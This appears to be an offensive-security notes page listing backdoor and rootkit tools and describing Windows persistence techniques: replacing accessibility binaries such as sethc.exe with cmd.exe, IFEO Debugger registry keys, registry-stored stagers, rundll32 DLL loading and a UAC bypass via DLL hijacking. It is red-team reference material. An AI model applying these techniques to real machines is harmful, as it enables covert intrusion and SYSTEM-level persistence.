chromebackdoor - Chromebackdoor is a PoC of pentest tool, this tool use a MITB technique for generate a windows executable ".exe" after launch run a malicious extension or script on most popular browsers, and send all DOM data on command and control.
cymothoa - Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.
casper-fs - Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even the root has permission to see the files or make actions like edit and remove. The files only can be caught, edited, and deleted if the user sends a proper key to the custom device to liberate the action in the file system.
OSRipper - AV evading OSX Backdoor and Crypter Framework
TripleCross - A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.
Nidhogg - Nidhogg is an all-in-one simple to use rootkit for red teams.
If using kerberos, we can replace the username and password with /authority:"Kerberos:[Domain]\[Server]"
One common, low-skill method of achieving persistence is replacing the Windows accessibility features’ binary files with their own malicious binary or simply a renamed copy of Windows ‘cmd.exe’.
When a user tries to use the accessibility features, for example sticky keys, they will execute the ‘sethc.exe’ binary, which the attacker may have replaced with 'cmd.exe'. The result is that the user will be presented with a Windows command prompt.
Due to the Windows accessibility features being available from the lock screen of desktops and servers, they can be triggered without any credentials; and due to no user being logged into the machine, Windows has no concept of who should be triggering the binary. As such, the malicious binary will run under the context of the SYSTEM account. Desktops and servers which have RDP enabled increase the risk of an attacker being able to remotely trigger the persistence mechanism.
The binaries for the accessibility features can be found in C:\Windows\System32\
The Image File Execution Option (IFEO) function allows for adding a debugging key into the registry, which causes the debugging binary to be executed when the target is launched.
This registry entry then adds string values (REG_SZ) called ‘Debugger’, with a value which contains the path and binary name, i.e ‘C:\Users\Administrator\Malware.exe’
A clever way malicious actors can gain persistence on target machines by exploiting legitimate features of Windows OS
Inject your stager in what ever form you choose (usually exe) into the target registry location
PTFM: Registry Injection - pg. 25
Image File Execution Options Injection - IFEO
Image File Execution Options (IFEO) registry key is a Windows feature commonly used by developers to attach a debugger to their application.
IFEOs can be directly set via the registry or through GlobalFlags (gflags.exe), an app which is part of the Windows 10 SDK.
IFEOs can also enable a monitor program to be launched on silent exit of another program (is terminated early by itself or a second, non kernel-mode process).
A user can execute any binary file after another application is closed, or execute any binary as a debugger whenever another application is opened. This means that if a malicious actor is able to gain access to a target machine, they can abuse these values to obtain persistence and privilege escalation by planting a malicious executable to be loaded and run whenever a specified program (i.e. notepad.exe) opens/closes.
The .exe you inject will need to be specifically compiled as a windows service if hiding this way, or the OS will kill it
Another way is to have your stager drop a DLL instead of an EXE and reference it from a Registry key using rundll32
>RUNDLL32.exe dllnameentrypoint
It is possible to store and run Javascript in the Registry
DLLHijackingScanner - This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.